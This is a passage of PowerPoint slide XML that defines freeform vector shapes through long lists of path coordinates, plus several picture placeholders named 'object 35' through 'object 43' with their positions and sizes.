                  <a:lnTo>
                    <a:pt x="0" y="23612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223128" y="104817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223128" y="79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181D6C0E-F1B7-5BC8-4B2B-CA8FF8501936}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5794484" y="2552796"/>
              <a:ext cx="751840" cy="551815"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="65486" y="446771"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="65486" y="468846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292013" y="551772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370019" y="538156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295034" y="538156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291459" y="537837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293290" y="537518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92511" y="464016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="464016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74786" y="457528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="457528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69954" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65486" y="446771"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="293290" y="537518"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291459" y="537837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295034" y="538156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293290" y="537518"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="737755" y="459933"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="293290" y="537518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295034" y="538156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370019" y="538156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="471549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="465744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="465744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="459933"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="743483" y="458933"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="737755" y="459933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="465744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743483" y="458933"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="751593" y="458933"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="743483" y="458933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="465744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="465744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="458933"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="74786" y="457528"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="79324" y="464016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="459189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74786" y="457528"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="79324" y="459189"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="79324" y="464016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92511" y="464016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="459189"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="737755" y="446905"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="737755" y="459933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743483" y="458933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="458933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742222" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="446905"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="79324" y="457528"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74786" y="457528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="459189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="457528"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="65486" y="442131"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="65486" y="446771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69954" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68694" y="446905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65486" y="442131"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="79324" y="442131"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="65486" y="442131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69831" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="442131"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="737755" y="442131"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="737755" y="446905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742222" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="442131"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="751593" y="442131"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="737755" y="442131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742222" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="448597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="442131"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="480235" y="8277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="466265" y="8277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473560" y="14206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467161" y="14618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516418" y="363061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="446905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737755" y="442131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="442131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="437363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539664" y="357079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529548" y="357079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525151" y="351581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528771" y="351581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480235" y="8277"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="479064" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="454418" y="1589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="81143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53454" y="441855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65486" y="446771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65486" y="442131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="442131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79324" y="437493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75510" y="435934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66565" y="435934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62340" y="430551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65767" y="430551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15833" y="93591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9025" y="93591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14674" y="85773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53678" y="85773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455906" y="15357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455687" y="15357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467161" y="14618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466265" y="8277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480235" y="8277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479064" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="62340" y="430551"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66565" y="435934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65988" y="432042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62340" y="430551"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="65988" y="432042"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66565" y="435934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75510" y="435934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65988" y="432042"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="65767" y="430551"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="62340" y="430551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65988" y="432042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65767" y="430551"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="525151" y="351581"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="529548" y="357079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528976" y="353030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525151" y="351581"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="528976" y="353030"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="529548" y="357079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539664" y="357079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528976" y="353030"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="528771" y="351581"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="525151" y="351581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528976" y="353030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528771" y="351581"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="14674" y="85773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9025" y="93591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15661" y="92429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14674" y="85773"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="15661" y="92429"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9025" y="93591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15833" y="93591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15661" y="92429"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="53678" y="85773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14674" y="85773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15661" y="92429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53678" y="85773"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="751840" h="551814">
                  <a:moveTo>
                    <a:pt x="466265" y="8277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="467103" y="14206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467161" y="14618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473560" y="14206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466265" y="8277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9" name="object 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{493B432E-92C7-DAC1-2A20-71AA2AC0840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61700" y="2613091"/>
              <a:ext cx="405321" cy="337490"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="40" name="object 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87068083-5FAF-6F8D-2770-6E332D8351B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56256" y="2657360"/>
              <a:ext cx="230478" cy="229870"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41" name="object 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D43F462-2206-95FB-E3A5-134FF28B1DD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83548" y="3438001"/>
              <a:ext cx="434845" cy="617746"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="object 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9891FDAC-F4A6-5F7F-30D2-010B2B17D24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44498" y="3469296"/>
              <a:ext cx="363687" cy="578099"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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FC0F064E-AEE9-4E54-9BD7-147F499E674E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4386709" y="3429622"/>
              <a:ext cx="445770" cy="637540"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="382169" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="66527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="609446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64471" y="637411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157343" y="620790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68858" y="620790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64004" y="620223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66515" y="619774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29828" y="603861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="603861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11839" y="596058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="596058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="82046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9924" y="82046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="73679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57992" y="73679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380631" y="17515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378532" y="16755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428446" y="16755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382169" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="66515" y="619774"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="64004" y="620223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68858" y="620790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66515" y="619774"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="428400" y="555011"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66515" y="619774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68858" y="620790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157343" y="620790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="569245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="562127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="562127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="555011"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="11839" y="596058"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16951" y="603861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="598276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11839" y="596058"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="16951" y="598276"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16951" y="603861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29828" y="603861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="598276"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="16951" y="596058"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11839" y="596058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="598276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="596058"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="435407" y="553757"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="428400" y="555011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="562127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435407" y="553757"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="445352" y="553757"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="435407" y="553757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="562127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="562127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="553757"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="428400" y="34818"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="428400" y="555011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435407" y="553757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="553757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="36849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434010" y="36849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="34818"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="16951" y="73679"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9924" y="82046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="80823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="73679"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="16951" y="80823"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9924" y="82046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="82046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="80823"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="57992" y="73679"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16951" y="73679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16951" y="80823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57992" y="73679"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="428400" y="28853"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="428400" y="34818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434010" y="36849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="28853"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="445352" y="28853"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="428400" y="28853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434010" y="36849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="36849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="28853"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="428446" y="16755"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="378532" y="16755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382867" y="17126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380631" y="17515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="34818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428400" y="28853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="28853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445352" y="22876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428446" y="16755"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="445770" h="637539">
                  <a:moveTo>
                    <a:pt x="378532" y="16755"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="380631" y="17515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382867" y="17126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378532" y="16755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4" name="object 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8B8874F-1D17-EE80-D6C8-36727B805B25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95273" y="4531761"/>
              <a:ext cx="239658" cy="98894"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5B94F163-3013-FE1D-1991-877FEB2B8233}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5425544" y="4419281"/>
              <a:ext cx="594360" cy="214629"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="594360" h="214629">
                  <a:moveTo>
                    <a:pt x="239337" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="175996" y="1262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119573" y="7692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71914" y="18857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34867" y="34324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5414" y="100832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58642" y="147528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103015" y="168221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156934" y="186076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218680" y="200289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286533" y="210060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354943" y="214397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418283" y="213134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474706" y="206703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522365" y="195538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559412" y="180071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594283" y="137961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588867" y="113563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535639" y="66868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491265" y="46175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437346" y="28321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375600" y="14108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307747" y="4337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23933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6" name="object 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{528D27D9-0CD6-94DB-6056-D9312B6989B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29040" y="4073640"/>
              <a:ext cx="184006" cy="163035"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="47" name="object 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
